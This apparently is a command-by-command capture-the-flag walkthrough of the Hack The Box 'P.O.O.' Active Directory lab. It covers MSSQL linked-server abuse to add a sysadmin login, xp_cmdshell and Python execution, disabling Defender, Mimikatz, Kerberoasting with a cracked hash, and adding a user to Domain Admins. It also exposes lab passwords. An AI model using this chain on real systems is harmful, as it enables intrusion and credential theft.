P.O.O.
https://app.hackthebox.com/endgames/poo
Introducción
Professional Offensive Operations
Professional Offensive Operations is a rising name in the cyber security world.
Lately they've been working into migrating core services and components to a state of the art cluster which offers cutting edge software and hardware.
P.O.O. is designed to put your skills in enumeration, lateral movement, and privilege escalation to the test within a small Active Directory environment that is configured with the latest operating systems and technologies.
The goal is to compromise the perimeter host, escalate privileges and ultimately compromise the domain while collecting several flags along the way.
Entry Point: 10.13.38.11
Enumeration
ping -c 1 10.13.38.11 -R
NMAP Scans
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.13.38.11 -oG allPorts
nmap -p80,1433 -sCV 10.13.38.11 -oN targeted
# Nmap 7.94SVN scan initiated Fri Mar 29 18:18:25 2024 as: nmap -p80,1433 -sCV -oN targeted 10.13.38.11
Nmap scan report for 10.13.38.11
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2024-03-29T22:18:45+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| 10.13.38.11:1433:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-29T19:52:54
|_Not valid after: 2054-03-29T19:52:54
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 29 18:18:41 2024 -- 1 IP address (1 host up) scanned in 16.08 seconds
Bruteforce Directories
dirsearch -u 10.13.38.11
DS Enumeration Directory
python ds_walk.py -u http://10.13.38.11
Output of ds_walk.py
[32m[!] .ds_store file is present on the webserver.0m
[32m[+] Enumerating directories based on .ds_server file:0m
----------------------------
[!] http://10.13.38.11/admin
[!] http://10.13.38.11/dev
[!] http://10.13.38.11/iisstart.htm
[!] http://10.13.38.11/Images
[!] http://10.13.38.11/JS
[!] http://10.13.38.11/META-INF
[!] http://10.13.38.11/New folder
[!] http://10.13.38.11/New folder (2)
[!] http://10.13.38.11/Plugins
[!] http://10.13.38.11/Templates
[!] http://10.13.38.11/Themes
[!] http://10.13.38.11/Uploads
[!] http://10.13.38.11/web.config
[!] http://10.13.38.11/Widgets
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11/Images/buttons
[!] http://10.13.38.11/Images/icons
[!] http://10.13.38.11/Images/iisstart.png
----------------------------
[!] http://10.13.38.11/JS/custom
----------------------------
[!] http://10.13.38.11/Themes/default
----------------------------
[!] http://10.13.38.11/Widgets/CalendarEvents
[!] http://10.13.38.11/Widgets/Framework
[!] http://10.13.38.11/Widgets/Menu
[!] http://10.13.38.11/Widgets/Notifications
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11/Widgets/Framework/Layouts/custom
[!] http://10.13.38.11/Widgets/Framework/Layouts/default
----------------------------
[32m[*] Finished traversing. No remaining .ds_store files present.0m
[32m[*] Cleaning up .ds_store files saved to disk.0m
IIS Shortname Scanner
python3 iis_shortname_scanner.py http://10.13.38.11/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/
python3 iis_shortname_scanner.py http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/
poo_co~1.txt
_co%%%%
Path bruteforce with WFUZZ
grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > co_fuzz.txt
wc -l co_fuzz.txt
wfuzz -c -w co_fuzz.txt -u http://10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_FUZZ.txt --hc 404
curl 10.13.38.11/dev/304c0c90fbc6520610abbf378e2339d1/db/poo_connection.txt
MSSQL Enumeration / Linkcrawler
msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
run
search mssql
use exploit/windows/mssql/mssql_linkcrawler
show options
set PASSWORD #p00Public3xt3rnalUs3r#
set USERNAME external_user
set RHOST 10.13.38.11
Installing USQL for client to MSSQL
go install -tags most github.com/xo/usql@latest
usql
\c mssql://external_user@10.13.38.11:1433
#p00Public3xt3rnalUs3r#
MSSQL Enumeration
SELECT name FROM sys.databases;
SELECT suser_name();
SELECT name,sysadmin FROM syslogins;
SELECT srvname, isremote FROM sysservers;
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select current_user');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select name,sysadmin from syslogins');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",'select srvname,isremote from sysservers');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'EXECUTE(''SELECT * FROM OPENQUERY([COMPATIBILITY\POO_PUBLIC], ''''SELECT SUSER_NAME();'''');'')');
SELECT * FROM OPENQUERY([COMPATIBILITY\POO_CONFIG], 'SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''SERVER'');');
SELECT * FROM openquery("COMPATIBILITY\POO_CONFIG",select * from openquery("COMPATIBILITY\POO_PUBLIC", ''select name from master.dbo.sysdatabases'')');
Adding Username to the DB
EXECUTE('EXECUTE(''EXEC master..sp_addlogin ''''3ky'''', ''''3ky123!'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
EXECUTE('EXECUTE(''EXEC master..sp_addsrvrolemember ''''3ky'''',''''sysadmin'''''') AT "COMPATIBILITY\POO_PUBLIC"') AT "COMPATIBILITY\POO_CONFIG";
Check Username
msfconsole
search mssql
use auxiliary/admin/mssql/mssql_enum
show options
set PASSWORD 3ky123!
set USERNAME 3ky
set RHOST 10.13.38.11
run
XP_cmdshell
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'whoami';
go
Enabling external scripts
EXEC sp_configure 'external scripts enabled', 1
reconfigure
go
Using external scripts (example)
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("whoami")'
go
Type web.config for extract administrator credentials.
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("type C:\\inetpub\\wwwroot\\web.config")'
go
EXEC sp_execute_external_script
@language = N'Python',
@script = N'import os; os.system("netstat -ano")'
go
echo "dead:beef::1001 compatibility.htb" | sudo tee -a /etc/hosts
Evil-WinRM
evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O."
net user administrator
Set-MpPreference -DisableRealtimeMonitoring $true
Mimikatz.exe
.\mimikatz.exe token::elevate lsadump::cache exit
Invoke-Kerberoast.ps1
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'powershell -exec bypass -c "import-module C:\temp\invoke-kerberoast.ps1; invoke-kerberoast -outputformat haschat | f1"'
go
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$A645B9CC69231DECE1D6EA7597FB0E47$83861CAE6474DF369FBC7DA10206403F8460129473B851720026FCD45D4FB62EDCD4A13024BF16DC09BF337F6EBA54FFF32308E523A1A9521211731C7108C712ABA91227A0051ABDEDD9CFA769A7AAAC8997163F0AF9DF29CF4E96276A044751340D8F26A3BE509A2FAC9E13B4EF851B8905180DD0C4B374A9133EC007DA9E54228613A91DCBA56879E42CAC146D0178BD936FB88C9271DB4338100E5DF1A81AF3F36D61C435984A5CF9B02FC8DB077F16C8921C22FAADF78B5B91447FD1B3DADA006663BD91FD0A5E5F3B33593F3C47AF2CE1C4A863C7DC3DCAE9F5EE8E0B980199DC7F6E9AC85E661BEADFAD7B219CBE0B60C822A61FFF2152E9E71FBE3E3E82E26C513AE664AC2C1312183D99136D70EF8FFC7DBA9CE8B49D941737BF18D511D11BCD004FA7EBB37469FCA6BFCCD6E281363DA5AEC48B0A92F34039812EDB042ADD4B9E22D89BC1402D3760D417E7C84022954B70FCE28B629BEA40A3F3EB88895A49B9039D3421E0BA17D5578927CC6E006C9859E9FF7BB1F7FAAFBC733FAAE18FB726B67D4EF1643B4B88F227A0B1794C0EA05D7996C565BA85DFDDFC0ED4E2D3FF66AB13763E91937B258FDCFCCA02FF53DF48B45086E89CEC99E898C2DD4A5E12DD53EBC9F4325A2F45A1EE895F6FDD2324AFC629243AFEFA098C714D863FE8C6A198DABF661563D106C767BAAEE3D27911EB701D49DCD702CA121E110125EE1DB0F759BF53E6E6DABBA7863638DC09A420C15638B830A869FB359DD1367FFBDA04EAD4711B2BDBA9B7B9D4AAEFB819A25CC358943A234CB262CB3B1FD69FC1D9724A01AC46B711917C6B1D9DDFA2F623FC7C0E1444522BF84C0FC5A1943DCC6D074EE151CB1B25C2A50F91A465086DAFEF44A7ABEC8463E8B3B33E922E1648458609220C2B79F2C264C5FEA08AF969F64A5C05E2D2570CCA9BB401263CCBE851FA15C554C2C021EFF2FB9A293ACF898F67296407CF2ADDEE36B8BAD716FB61C8800BAD049CE63A7AA31D8D7891D47028EC26E4900F883F6C9B7FDA430D1B1602F2D969F6BDBEEBEB5A0E40655B1DCE23CA43C2A3FCF2AB4B34D872D0BE0A58C17194FE3B1726031B7909A37D2C470CF61AAF204E1942E2E1B78D11F3921B4F03CFD68F23BB702ADF84EF2D99F75D91CBD5183E450BDE04236BAB0C66F42AD7141B1AFB7963E56B37668AE24ADA1B378C8D9993AE5723C0B0FC11A8372EB738D18988D90C736D1A4B3979CE16C344FD3B33B957756F5C5C03AD3978DC912A048A9EBCA6A244CE84AEA74D57066DA235CCA373571DCE88A0B8D21A4053C9ABC075C4208164E10D9762A9F06193BA833261F245D525A38FF590DFBA50D9FD29B6997D094D9C592D2F92AA3BEC0441126EBBFCE6105FDDD5135654820F6221C2CE12B6AFE5E4B403E488616313874FBEB4452037BA63964051DAE064F9503E9740B4C5E51F24CE795B8FF078ECC6D0E1E642A383C8AAFCBAD5A822
hashcat -a0 -m 13100 hash.txt /usr/share/wordlists/seclists/Passwords/Keyboard-Combinations.txt
ZQ!5t4r
Sharphound
sqlcmd -S 10.13.38.11 -U 3ky -P 3ky123!
xp_cmdshell 'cd C:\temp && SharpHound.exe -c all'
go
PowerView.ps1
evil-winrm -i compatibility.htb -u Administrator -p "EverybodyWantsToWorkAtP.O.O." -s .
$user = 'intranet.poo\p00_adm'
$pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force -AsPlainText
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$pass
Add-DomainGroupMember -Identity "Domain Admins" -Members "p00_adm" -Credential $cred
$pass = ConvertTo-SecureString -AsPlainText 'ZQ!5t4r' -Force -AsPlainText
$cred = New-Object -TypeName System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $Cred
Última actualización